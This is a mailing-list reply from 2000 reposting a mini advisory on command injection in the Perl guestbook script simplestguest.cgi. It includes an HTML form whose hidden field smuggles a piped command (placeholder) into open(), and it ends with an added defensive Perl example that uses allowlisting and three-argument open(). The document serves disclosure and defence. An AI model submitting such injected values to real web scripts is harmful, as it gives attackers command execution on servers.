Subject: Re: Insecure input validation in simplestmail.cgi
From: suidSNEAKERZ.ORG
Date: Wed Dec 13 2000 - 20:05:46 CST


> simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif
> Wright.

The whole group of "simplest" CGIs are bad. Web developers: don't use them.

I didn't really post this because it's pretty lame, but I looked at a few of these
a while back and here's something I put on my site in February (which used to
be suid.edu and is now www.sneakerz.org/~suid/).

suidsneakerz.org - mini advisory - Tammies Husband Guestbook CGI

Software: simplestguest.cgi
URL: http://www.conservatives.net/atheist/scripts/simplestguest.html
Version: Version 2
Platforms: Unix
Type: Input validation problem

Summary:

        Anyone can execute any command on the remote system with
        the privileges of the web server.

Vulnerability:

        The Perl code does no input validation and performs an
        open() on a user supplied input.

Exploit:

        Build an HTML form resembling:

        <form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <command goes here> |">
                 <input type=hidden name="NAME" value="X">
                 <input type=submit>
        </form>

        Of course you could simply send this in a POST request directly
        to the web server. Whatever.

http://www.sneakerz.org/~suid/

EOF
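
Added example, not part of the original post and not the script's own code: one way to handle a form field that names a guestbook file, using an allowlist check and three-argument open(). It assumes the `guestbook` field selects the file to open; `$BOOK_DIR`, `guestbook_path` and `append_entry` are hypothetical names, and the sample inputs are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;

# Hypothetical directory holding guestbook files (an assumption for this example).
my $BOOK_DIR = '/var/www/guestbooks';

# Vulnerable pattern, shown only as a comment: two-argument open() parses its
# string for a mode, so a value that starts or ends with "|" is run as a command.
#   open(BOOK, $form{guestbook});

# Return a path under $BOOK_DIR for an acceptable guestbook name, or undef.
sub guestbook_path {
    my ($name) = @_;
    return undef unless defined $name;
    # Allowlist: a short bare file name; no slashes, pipes, spaces or newlines.
    # \A and \z anchor the whole string, so a trailing newline is rejected too.
    return undef unless $name =~ /\A([A-Za-z0-9][A-Za-z0-9_-]{0,31}\.html)\z/;
    return File::Spec->catfile($BOOK_DIR, $1);   # $1 is also untainted under -T
}

# Append an entry using three-argument open(): the mode is fixed by the code
# and the path is treated as a file name only, never as a command.
sub append_entry {
    my ($name, $entry) = @_;
    my $path = guestbook_path($name) or return 0;
    open(my $fh, '>>', $path) or return 0;
    print {$fh} $entry, "\n";
    close($fh) or return 0;
    return 1;
}

# Constructed sample inputs, including the shape of value from the advisory's form.
for my $value ('guestbook.html', ' | <command goes here> |',
               '../../etc/passwd', "book.html\n") {
    (my $shown = $value) =~ s/\n/\\n/g;
    my $verdict = defined(guestbook_path($value)) ? 'accepted' : 'rejected';
    printf "%-28s %s\n", "'$shown'", $verdict;
}
```

Running the CGI under taint mode (`perl -T`) adds a second check, since Perl then refuses to use unvalidated form data in an open() for writing or in a piped open.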